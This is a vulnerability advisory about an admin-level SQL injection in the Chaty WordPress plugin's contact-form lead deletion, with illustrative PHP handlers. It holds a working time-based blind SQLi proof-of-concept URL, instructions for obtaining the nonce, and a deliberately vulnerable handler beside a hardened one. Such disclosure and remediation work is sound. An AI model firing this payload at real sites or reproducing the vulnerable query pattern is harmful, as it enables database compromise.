The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin.
https://example.com/wp-admin/admin.php?page=chaty-contact-form-feed&remove_chaty_leads=9a03751f9d&action=delete_message&paged=1&search&chaty_leads=3)+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)%3B--+-

To get the nonce, check the source of https://example.com/wp-admin/admin.php?page=chaty-contact-form-feed for remove_chaty_leads
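As an added illustration, not the plugin's own code: a hypothetical WordPress delete handler for the chaty_leads parameter, first in the unsafe shape the advisory describes (value concatenated straight into SQL, so the nonce alone does not stop injection) and then a hardened form with a capability check, nonce verification, integer casting and a prepared statement. The table name, the capability and the nonce action string are assumptions.

```php
<?php
// Hypothetical handlers, not the plugin's real code. $wpdb is the WordPress DB object.

// VULNERABLE shape (as described in the advisory): request value used unescaped in SQL.
function chaty_delete_lead_vulnerable( $wpdb ) {
    $id = $_GET['chaty_leads']; // "3) AND (SELECT ...)" passes through untouched
    // Assumed table name for illustration.
    return $wpdb->query( "DELETE FROM {$wpdb->prefix}chaty_leads WHERE id IN ({$id})" );
}

// HARDENED form: privilege check, CSRF nonce check, strict typing, prepared statement.
function chaty_delete_lead_hardened( $wpdb ) {
    // Capability is an assumption; use whatever the feature actually requires.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    // Nonce query arg name comes from the advisory URL; the action string is assumed.
    // Note: this stops CSRF only, it is not an injection defence.
    check_admin_referer( 'remove_chaty_leads', 'remove_chaty_leads' );

    // Accept a comma-separated list of ids; absint() turns anything non-numeric into 0,
    // which array_filter() then drops, so no SQL syntax can survive.
    $raw = isset( $_GET['chaty_leads'] ) ? wp_unslash( $_GET['chaty_leads'] ) : '';
    $ids = array_values( array_filter( array_map( 'absint', explode( ',', (string) $raw ) ) ) );
    if ( empty( $ids ) ) {
        return 0;
    }

    // One %d placeholder per id; $wpdb->prepare() binds the values safely.
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    $table        = $wpdb->prefix . 'chaty_leads'; // assumed table name
    $sql          = $wpdb->prepare( "DELETE FROM {$table} WHERE id IN ({$placeholders})", $ids );
    return $wpdb->query( $sql );
}
```

With the hardened handler the advisory's payload collapses to id 3 only, and the injected SLEEP() never reaches the database.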
Nguyen Duy Quoc Khanh
Yes
2022-11-14 (about 6 months ago)